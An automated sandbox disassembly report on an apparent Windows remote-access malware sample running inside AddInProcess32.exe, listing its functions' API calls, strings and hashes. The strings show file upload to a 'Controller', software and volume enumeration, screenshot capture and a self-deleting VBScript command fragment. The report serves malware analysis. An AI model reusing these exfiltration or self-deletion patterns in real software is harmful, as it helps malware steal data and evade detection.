                                        • String ID: 6$C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe$del$open
                                        • API String ID: 1579085052-1506045317
                                        • Opcode ID: 13f7aa7ccb2e11be31f7ad96e96a4d93445e7550d40e25192285b95e595fa052
                                        • Instruction ID: 6918cae47ac4af68ec004dabb58255b0e3542cbe00f5913d2fcd66cab837b2ae
                                        • Opcode Fuzzy Hash: 13f7aa7ccb2e11be31f7ad96e96a4d93445e7550d40e25192285b95e595fa052
                                        • Instruction Fuzzy Hash: CA51A620208302ABD605B7659C92A6F679D9F84719F10443FF609A62E3EFBC9D05866E
                                        Function 0041C01B Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 139stringCOMMON
                                        Download Yara Rule
                                        APIs
                                        • lstrlenW.KERNEL32(?), ref: 0041C036
                                        • _memcmp.LIBVCRUNTIME ref: 0041C04E
                                        • lstrlenW.KERNEL32(?), ref: 0041C067
                                        • FindFirstVolumeW.KERNEL32(?,00000104,?), ref: 0041C0A2
                                        • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 0041C0B5
                                        • QueryDosDeviceW.KERNEL32(?,?,00000064), ref: 0041C0F9
                                        • lstrcmpW.KERNEL32(?,?), ref: 0041C114
                                        • FindNextVolumeW.KERNEL32(?,0000003F,00000104), ref: 0041C12C
                                        • _wcslen.LIBCMT ref: 0041C13B
                                        • FindVolumeClose.KERNEL32(?), ref: 0041C15B
                                        • GetLastError.KERNEL32 ref: 0041C173
                                        • GetVolumePathNamesForVolumeNameW.KERNEL32(?,?,?,?), ref: 0041C1A0
                                        • lstrcatW.KERNEL32(?,?), ref: 0041C1B9
                                        • lstrcpyW.KERNEL32(?,?), ref: 0041C1C8
                                        • GetLastError.KERNEL32 ref: 0041C1D0
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Volume$ErrorFindLast$lstrlen$CloseDeviceFirstNameNamesNextPathQuery_memcmp_wcslenlstrcatlstrcmplstrcpy
                                        • String ID: ?
                                        • API String ID: 3941738427-1684325040
                                        • Opcode ID: 8bb61c95002590c369f4a1d7d05134d86b2ad7932cc4dc2ebb1cdf4d201e776a
                                        • Instruction ID: a349862c8cee18361e8dc915c9858c0b302c9409c899df8dda18ff866c7f94c5
                                        • Opcode Fuzzy Hash: 8bb61c95002590c369f4a1d7d05134d86b2ad7932cc4dc2ebb1cdf4d201e776a
                                        • Instruction Fuzzy Hash: 8B416171584316EBD720DFA0DC889EB77ECAB49755F00092BF545C2261EB78C988CBDA
                                        Function 0044F42D Relevance: 25.9, APIs: 17, Instructions: 419COMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: _free$EnvironmentVariable$_wcschr
                                        • String ID:
                                        • API String ID: 3899193279-0
                                        • Opcode ID: 8c398c17f7198d8e95fa4204fbdfe0aa09a5082618e125736fc7a2c78f972757
                                        • Instruction ID: f75d98bba309171a1893162bbba9979c566f834f65d54a181aa040c21db392b6
                                        • Opcode Fuzzy Hash: 8c398c17f7198d8e95fa4204fbdfe0aa09a5082618e125736fc7a2c78f972757
                                        • Instruction Fuzzy Hash: C4D13672D007006BFB20AF799D81A6B77A4EF01318F05427FE919A7382EB3D99058799
                                        Function 00412AB4 Relevance: 25.0, APIs: 9, Strings: 5, Instructions: 482sleepfileCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00412ACD
                                          • Part of subcall function 0041B978: GetCurrentProcessId.KERNEL32(00000000,76233530,00000000,?,?,?,?,00466468,0040D20D,.vbs,?,?,?,?,?,004752F0), ref: 0041B99F
                                          • Part of subcall function 00418568: CloseHandle.KERNEL32(004040F5,?,?,004040F5,00465E74), ref: 0041857E
                                          • Part of subcall function 00418568: CloseHandle.KERNEL32(t^F,?,?,004040F5,00465E74), ref: 00418587
                                        • Sleep.KERNEL32(0000000A,00465E74), ref: 00412C1F
                                        • Sleep.KERNEL32(0000000A,00465E74,00465E74), ref: 00412CC1
                                        • Sleep.KERNEL32(0000000A,00465E74,00465E74,00465E74), ref: 00412D63
                                        • DeleteFileW.KERNEL32(00000000,00465E74,00465E74,00465E74), ref: 00412DC5
                                        • DeleteFileW.KERNEL32(00000000,00465E74,00465E74,00465E74), ref: 00412DFC
                                        • DeleteFileW.KERNEL32(00000000,00465E74,00465E74,00465E74), ref: 00412E38
                                        • Sleep.KERNEL32(000001F4,00465E74,00465E74,00465E74), ref: 00412E52
                                        • Sleep.KERNEL32(00000064), ref: 00412E94
                                          • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Sleep$File$Delete$CloseHandle$CurrentModuleNameProcesssend
                                        • String ID: /stext "$0TG$0TG$NG$NG
                                        • API String ID: 1223786279-2576077980
                                        • Opcode ID: 43fca82e1c615bf5f6bdb904a52ce5315b981c6b52c5288b2b6fba8476c1e577
                                        • Instruction ID: 3b0169c2c8bc9f0d695cedb60fdc7b81a1931596247e975dd6f1dc47d42db627
                                        • Opcode Fuzzy Hash: 43fca82e1c615bf5f6bdb904a52ce5315b981c6b52c5288b2b6fba8476c1e577
                                        • Instruction Fuzzy Hash: 990255311083418AC325FB62D851AEFB3E5AFD4348F50483EF58A971E2EF785A49C65A
                                        Function 00414D86 Relevance: 24.6, APIs: 9, Strings: 5, Instructions: 109libraryloaderCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00414DD5
                                        • LoadLibraryA.KERNEL32(?), ref: 00414E17
                                        • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00414E37
                                        • FreeLibrary.KERNEL32(00000000), ref: 00414E3E
                                        • LoadLibraryA.KERNEL32(?), ref: 00414E76
                                        • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00414E88
                                        • FreeLibrary.KERNEL32(00000000), ref: 00414E8F
                                        • GetProcAddress.KERNEL32(00000000,?), ref: 00414E9E
                                        • FreeLibrary.KERNEL32(00000000), ref: 00414EB5
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Library$AddressFreeProc$Load$DirectorySystem
                                        • String ID: \ws2_32$\wship6$freeaddrinfo$getaddrinfo$getnameinfo
                                        • API String ID: 2490988753-744132762
                                        • Opcode ID: 5f1d90fefb9d3b4d80abd47ac0ceceaf8be97214d3ee7f7b1d429d579a686c66
                                        • Instruction ID: d7a8240acd80c680e6a706eb94e62412fcb65bdb905c2e3468e0ccb64a1f64dc
                                        • Opcode Fuzzy Hash: 5f1d90fefb9d3b4d80abd47ac0ceceaf8be97214d3ee7f7b1d429d579a686c66
                                        • Instruction Fuzzy Hash: 8C31D5B1902315A7C320EF65DC84EDBB7D8AF84744F004A2AF94893250D778DD858BEE
                                        Function 0041C68F Relevance: 23.0, APIs: 6, Strings: 7, Instructions: 214registryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Uninstall,00000000,00020019,?), ref: 0041C6B1
                                        • RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 0041C6F5
                                        • RegCloseKey.ADVAPI32(?), ref: 0041C9BF
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CloseEnumOpen
                                        • String ID: DisplayName$DisplayVersion$InstallDate$InstallLocation$Publisher$Software\Microsoft\Windows\CurrentVersion\Uninstall$UninstallString
                                        • API String ID: 1332880857-3714951968
                                        • Opcode ID: 01bc9fe353fd2bad3d2e5d6b02442aa3bdaad2c57b214901d2918a8b4713c134
                                        • Instruction ID: af0903b0dab8fbea49832074ad132f154b97281cd99b968e1e8b6bf9777b958e
                                        • Opcode Fuzzy Hash: 01bc9fe353fd2bad3d2e5d6b02442aa3bdaad2c57b214901d2918a8b4713c134
                                        • Instruction Fuzzy Hash: 248144711083419BC325EF11D851EEFB7E8BF94309F10492FB589921A1FF78AE49CA5A
                                        Function 0041D58F Relevance: 22.8, APIs: 12, Strings: 1, Instructions: 74windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • DefWindowProcA.USER32(?,00000401,?,?), ref: 0041D5DA
                                        • GetCursorPos.USER32(?), ref: 0041D5E9
                                        • SetForegroundWindow.USER32(?), ref: 0041D5F2
                                        • TrackPopupMenu.USER32(00000000,?,?,00000000,?,00000000), ref: 0041D60C
                                        • Shell_NotifyIconA.SHELL32(00000002,00474B48), ref: 0041D65D
                                        • ExitProcess.KERNEL32 ref: 0041D665
                                        • CreatePopupMenu.USER32 ref: 0041D66B
                                        • AppendMenuA.USER32(00000000,00000000,00000000,Close), ref: 0041D680
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Menu$PopupWindow$AppendCreateCursorExitForegroundIconNotifyProcProcessShell_Track
                                        • String ID: Close
                                        • API String ID: 1657328048-3535843008
                                        • Opcode ID: dc0ab9a0fe4ab677523636461039160516679b910eee6fe46bba41fdb84f3345
                                        • Instruction ID: 483e3be36cf21f9f431d69439bfbb75804d706e25d1e382f075e68ac53faeb55
                                        • Opcode Fuzzy Hash: dc0ab9a0fe4ab677523636461039160516679b910eee6fe46bba41fdb84f3345
                                        • Instruction Fuzzy Hash: 392127B1944208FFDB194FA4ED0EAAA3B65FB08342F000135FA0A950B1D775EDA1EB5D
                                        Function 00445D56 Relevance: 22.8, APIs: 15, Instructions: 296COMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: _free$Info
                                        • String ID:
                                        • API String ID: 2509303402-0
                                        • Opcode ID: 8630906f26d86e97c2d01feafad3d8567ddb50c678f2cb36b5e7577a775c1f69
                                        • Instruction ID: 88ee944febda996c7adaaf7605242af7944d99fb061a5fd2e4f26fad8993db39
                                        • Opcode Fuzzy Hash: 8630906f26d86e97c2d01feafad3d8567ddb50c678f2cb36b5e7577a775c1f69
                                        • Instruction Fuzzy Hash: 75B1CD719006059FEF20DF69C881BEEBBB4FF09304F14412EF5A8A7242D6799D45CB65
                                        Function 00408B7A Relevance: 21.3, APIs: 8, Strings: 4, Instructions: 328fileCOMMON
                                        Download Yara Rule
                                        APIs
                                        • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,000000B6), ref: 00408CE3
                                        • GetFileSizeEx.KERNEL32(00000000,?), ref: 00408D1B
                                        • __aulldiv.LIBCMT ref: 00408D4D
                                          • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                          • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                                        • SetFilePointerEx.KERNEL32(00000000,?,?,00000000,00000000), ref: 00408E70
                                        • ReadFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 00408E8B
                                        • CloseHandle.KERNEL32(00000000), ref: 00408F64
                                        • CloseHandle.KERNEL32(00000000,00000052), ref: 00408FAE
                                        • CloseHandle.KERNEL32(00000000), ref: 00408FFC
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: File$CloseHandle$CreateLocalPointerReadSizeTime__aulldivsend
                                        • String ID: ReadFile error$SetFilePointerEx error$Uploading file to Controller: $NG
                                        • API String ID: 3086580692-2582957567
                                        • Opcode ID: ac03fb4c65dba1e00ad85bddeb5cd6a2338259a2d76885715b59f9cdcb56bc14
                                        • Instruction ID: 4fd1ef8f0950b8c70c5ee12d710945c0a569e6ad21e20d2a74dcf75f3ec9a52d
                                        • Opcode Fuzzy Hash: ac03fb4c65dba1e00ad85bddeb5cd6a2338259a2d76885715b59f9cdcb56bc14
                                        • Instruction Fuzzy Hash: 95B193716083409BC314FB25C982AAFB7E5AFC4354F50492FF589622D2EF789945CB8B
                                        Function 004512C6 Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • ___free_lconv_mon.LIBCMT ref: 0045130A
                                          • Part of subcall function 00450502: _free.LIBCMT ref: 0045051F
                                          • Part of subcall function 00450502: _free.LIBCMT ref: 00450531
                                          • Part of subcall function 00450502: _free.LIBCMT ref: 00450543
                                          • Part of subcall function 00450502: _free.LIBCMT ref: 00450555
                                          • Part of subcall function 00450502: _free.LIBCMT ref: 00450567
                                          • Part of subcall function 00450502: _free.LIBCMT ref: 00450579
                                          • Part of subcall function 00450502: _free.LIBCMT ref: 0045058B
                                          • Part of subcall function 00450502: _free.LIBCMT ref: 0045059D
                                          • Part of subcall function 00450502: _free.LIBCMT ref: 004505AF
                                          • Part of subcall function 00450502: _free.LIBCMT ref: 004505C1
                                          • Part of subcall function 00450502: _free.LIBCMT ref: 004505D3
                                          • Part of subcall function 00450502: _free.LIBCMT ref: 004505E5
                                          • Part of subcall function 00450502: _free.LIBCMT ref: 004505F7
                                        • _free.LIBCMT ref: 004512FF
                                          • Part of subcall function 00446782: HeapFree.KERNEL32(00000000,00000000,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?), ref: 00446798
                                          • Part of subcall function 00446782: GetLastError.KERNEL32(?,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?,?), ref: 004467AA
                                        • _free.LIBCMT ref: 00451321
                                        • _free.LIBCMT ref: 00451336
                                        • _free.LIBCMT ref: 00451341
                                        • _free.LIBCMT ref: 00451363
                                        • _free.LIBCMT ref: 00451376
                                        • _free.LIBCMT ref: 00451384
                                        • _free.LIBCMT ref: 0045138F
                                        • _free.LIBCMT ref: 004513C7
                                        • _free.LIBCMT ref: 004513CE
                                        • _free.LIBCMT ref: 004513EB
                                        • _free.LIBCMT ref: 00451403
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                        • String ID:
                                        • API String ID: 161543041-0
                                        • Opcode ID: 9bfda5629608ba7fc19c0d50907ac959002cc076efa33527145bad7316b2b0bb
                                        • Instruction ID: 673b37a441ff9bbb7eb6cd98574e5fa8379d72fae64c09c4febd1ea684bb8cd8
                                        • Opcode Fuzzy Hash: 9bfda5629608ba7fc19c0d50907ac959002cc076efa33527145bad7316b2b0bb
                                        • Instruction Fuzzy Hash: 0E319E315007009FFB20AA7AD845B5B73E8EF0131AF50851FEC68D7662DF78AD448B59
                                        Function 00419FB4 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 176sleeptimeCOMMON
                                        Download Yara Rule
                                        APIs
                                        • __EH_prolog.LIBCMT ref: 00419FB9
                                        • GdiplusStartup.GDIPLUS(00474ACC,?,00000000), ref: 00419FEB
                                        • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,0000001A,00000019), ref: 0041A077
                                        • Sleep.KERNEL32(000003E8), ref: 0041A0FD
                                        • GetLocalTime.KERNEL32(?), ref: 0041A105
                                        • Sleep.KERNEL32(00000000,00000018,00000000), ref: 0041A1F4
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Sleep$CreateDirectoryGdiplusH_prologLocalStartupTime
                                        • String ID: time_%04i%02i%02i_%02i%02i%02i$wnd_%04i%02i%02i_%02i%02i%02i$PG$PG$PG
                                        • API String ID: 489098229-1431523004
                                        • Opcode ID: c46b288c88e8fad2cac684537be2f5c8f54ab494b41e10cc9a988c1d5ba90d08
                                        • Instruction ID: 65e100c03f0dda0ba9a952c873ad8774fe275ee1deca45487f64c7c8a8292b0e
                                        • Opcode Fuzzy Hash: c46b288c88e8fad2cac684537be2f5c8f54ab494b41e10cc9a988c1d5ba90d08
                                        • Instruction Fuzzy Hash: E7515D70A00215AACB14BBB5C8529ED7BA9AB44308F40403FF509AB1E2EF7C9D85C799
                                        Function 0040D7FF Relevance: 19.4, APIs: 3, Strings: 8, Instructions: 148COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00412850: TerminateProcess.KERNEL32(00000000,pth_unenc,0040F8C8), ref: 00412860
                                          • Part of subcall function 00412850: WaitForSingleObject.KERNEL32(000000FF), ref: 00412873
                                          • Part of subcall function 004136F8: RegOpenKeyExA.KERNELBASE(80000001,00000000,00000000,00020019,00000000,004752F0), ref: 00413714
                                          • Part of subcall function 004136F8: RegQueryValueExA.KERNELBASE(00000000,00000000,00000000,00000000,00000208,?), ref: 0041372D
                                          • Part of subcall function 004136F8: RegCloseKey.KERNELBASE(00000000), ref: 00413738
                                        • GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 0040D859
                                        • ShellExecuteW.SHELL32(00000000,open,00000000,00466468,00466468,00000000), ref: 0040D9B8
                                        • ExitProcess.KERNEL32 ref: 0040D9C4
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Process$CloseExecuteExitFileModuleNameObjectOpenQueryShellSingleTerminateValueWait
                                        • String ID: """, 0$.vbs$8SG$CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)$CreateObject("WScript.Shell").Run "cmd /c ""$Temp$exepath$open
                                        • API String ID: 1913171305-3159800282
                                        • Opcode ID: 1919afdde95df0f7d5e8eaec93ad62173513c64864e24cca9e1727ee7ecd3b6d
                                        • Instruction ID: 6fc8d312854778a25908ca85050b1cee1951ef16e4956e50e312a563d71e527c
                                        • Opcode Fuzzy Hash: 1919afdde95df0f7d5e8eaec93ad62173513c64864e24cca9e1727ee7ecd3b6d
                                        • Instruction Fuzzy Hash: 0C413A719001195ACB15FA62DC56DEEB778AF50309F10007FB10AB61E2EF785E4ACA98
                                        Function 00450600 Relevance: 18.4, APIs: 12, Instructions: 376COMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: _free
                                        • String ID:
                                        • API String ID: 269201875-0
                                        • Opcode ID: f13b302446b66475bb18d5d42f55ab1b7190c32ccf1072046f607fb9a40aa2ef
                                        • Instruction ID: d910990a8472ee08c0279d8077499983e41ff25138a9859a729e4309013b5263
                                        • Opcode Fuzzy Hash: f13b302446b66475bb18d5d42f55ab1b7190c32ccf1072046f607fb9a40aa2ef
                                        • Instruction Fuzzy Hash: E2C17476D40204AFEB20DBA9CC83FDE77B8AB19705F14015AFE05EB283D6B49D458798
                                        Function 00455BDB Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 272COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 004558A9: CreateFileW.KERNEL32(00000000,00000000,?,00455C84,?,?,00000000,?,00455C84,00000000,0000000C), ref: 004558C6
                                        • GetLastError.KERNEL32 ref: 00455CEF
                                        • __dosmaperr.LIBCMT ref: 00455CF6
                                        • GetFileType.KERNEL32(00000000), ref: 00455D02
                                        • GetLastError.KERNEL32 ref: 00455D0C
                                        • __dosmaperr.LIBCMT ref: 00455D15
                                        • CloseHandle.KERNEL32(00000000), ref: 00455D35
                                        • CloseHandle.KERNEL32(?), ref: 00455E7F
                                        • GetLastError.KERNEL32 ref: 00455EB1
                                        • __dosmaperr.LIBCMT ref: 00455EB8
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                        • String ID: H
                                        • API String ID: 4237864984-2852464175
                                        • Opcode ID: ad10cc44415123364ccf3ab0f87a2b5b2deaae059395c87e8052164914e7d7f7
                                        • Instruction ID: f4290dc4267d91ba683862cdaabef3013db21248f4240db41616def06e578eae
                                        • Opcode Fuzzy Hash: ad10cc44415123364ccf3ab0f87a2b5b2deaae059395c87e8052164914e7d7f7
                                        • Instruction Fuzzy Hash: D5A155329106049FDF19AF68DC617BE3BA0EB06325F14415EEC11EB392CB398D5ACB59
                                        Function 00453D83 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 268COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetCPInfo.KERNEL32(00000000,00000001,?,7FFFFFFF,?,?,0045405C,00000000,00000000,?,00000001,?,?,?,?,00000001), ref: 00453E2F
                                        • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000001,00000000,00000000,?,0045405C,00000000,00000000,?,00000001,?,?,?,?), ref: 00453EB2
                                        • __alloca_probe_16.LIBCMT ref: 00453EEA
                                        • MultiByteToWideChar.KERNEL32(00000001,00000001,?,00000001,00000000,\@E,?,0045405C,00000000,00000000,?,00000001,?,?,?,?), ref: 00453F45
                                        • __alloca_probe_16.LIBCMT ref: 00453F94
                                        • MultiByteToWideChar.KERNEL32(00000001,00000009,00000001,00000000,00000000,00000000,?,0045405C,00000000,00000000,?,00000001,?,?,?,?), ref: 00453F5C
                                          • Part of subcall function 00446137: RtlAllocateHeap.NTDLL(00000000,0043529C,?,?,00438847,?,?,00000000,?,?,0040DE62,0043529C,?,?,?,?), ref: 00446169
                                        • MultiByteToWideChar.KERNEL32(00000001,00000001,00000001,00000000,00000000,?,?,0045405C,00000000,00000000,?,00000001,?,?,?,?), ref: 00453FD8
                                        • __freea.LIBCMT ref: 00454003
                                        • __freea.LIBCMT ref: 0045400F
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ByteCharMultiWide$__alloca_probe_16__freea$AllocateHeapInfo
                                        • String ID: \@E
                                        • API String ID: 201697637-1814623452
                                        • Opcode ID: b82298bc980002c4571abe1a7b6d85811e1f97afd47d25fecd247c7af7e2facf
                                        • Instruction ID: bd5a1837779a5f2dcb5c2ea5aeb828518df7829aba760434011a70bbc407b236
                                        • Opcode Fuzzy Hash: b82298bc980002c4571abe1a7b6d85811e1f97afd47d25fecd247c7af7e2facf
                                        • Instruction Fuzzy Hash: E391F472E002069ADB209E65CC42AEFBBF59F09756F14052BFC01E7282D739DD89C768
                                        Function 00450A25 Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 204COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: _free
                                        • String ID: \&G$\&G$`&G
                                        • API String ID: 269201875-253610517
                                        • Opcode ID: f843711e33ddf2e4d4c3baca2ca6b2426e0ab7997c39caf6bf5fac4d84d12184
                                        • Instruction ID: 0b3297c67b001fbc5a9f4fbe1fd197d652097ca420ae28a40b4f72db8b3ed5d1
                                        • Opcode Fuzzy Hash: f843711e33ddf2e4d4c3baca2ca6b2426e0ab7997c39caf6bf5fac4d84d12184
                                        • Instruction Fuzzy Hash: 77610475900204AFDB20CFA9C882B9ABBF4EF05315F14416BED58EB342D774AD458B98
                                        Function 00414BB0 Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 158COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: 65535$udp
                                        • API String ID: 0-1267037602
                                        • Opcode ID: c855b19cc43d9bec36cd86ac5f012ace8f0d54e169e32fa1a21da6d4488bf9b2
                                        • Instruction ID: ff24d6befd6f0703c902a6165bd45161ed4db0fb5f75d2635e7e580b9b2721aa
                                        • Opcode Fuzzy Hash: c855b19cc43d9bec36cd86ac5f012ace8f0d54e169e32fa1a21da6d4488bf9b2
                                        • Instruction Fuzzy Hash: EF51E7756093019FDB209B58E9057BB37A4AFC4755F08082FF881973A1E76DCCC1865E
                                        Function 0043A83A Relevance: 16.6, APIs: 11, Instructions: 116COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A892
                                        • GetLastError.KERNEL32(?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A89F
                                        • __dosmaperr.LIBCMT ref: 0043A8A6
                                        • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A8D2
                                        • GetLastError.KERNEL32(?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A8DC
                                        • __dosmaperr.LIBCMT ref: 0043A8E3
                                        • WideCharToMultiByte.KERNEL32(?,00000000,00000000,000000FF,00000000,?,00000000,00000000,?,?,?,?,?,?,00401D55,?), ref: 0043A926
                                        • GetLastError.KERNEL32(?,?,?,?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A930
                                        • __dosmaperr.LIBCMT ref: 0043A937
                                        • _free.LIBCMT ref: 0043A943
                                        • _free.LIBCMT ref: 0043A94A
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ByteCharErrorLastMultiWide__dosmaperr$_free
                                        • String ID:
                                        • API String ID: 2441525078-0
                                        • Opcode ID: ad6d2cb2e677ca1b0a2e36bb2f761ff70c692d274a08f618d4296a8b89361871
                                        • Instruction ID: 785efe6d9c8e3fffb8b85045f967b8474775cb8629fdf0d32462ae01257f7f2e
                                        • Opcode Fuzzy Hash: ad6d2cb2e677ca1b0a2e36bb2f761ff70c692d274a08f618d4296a8b89361871
                                        • Instruction Fuzzy Hash: FF31F57140420AFFDF01AFA5CC45DAF3B68EF09325F10021AF950662A1DB38CD21DB6A
                                        Function 004054A0 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 155windowmemoryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • SetEvent.KERNEL32(?,?), ref: 004054BF
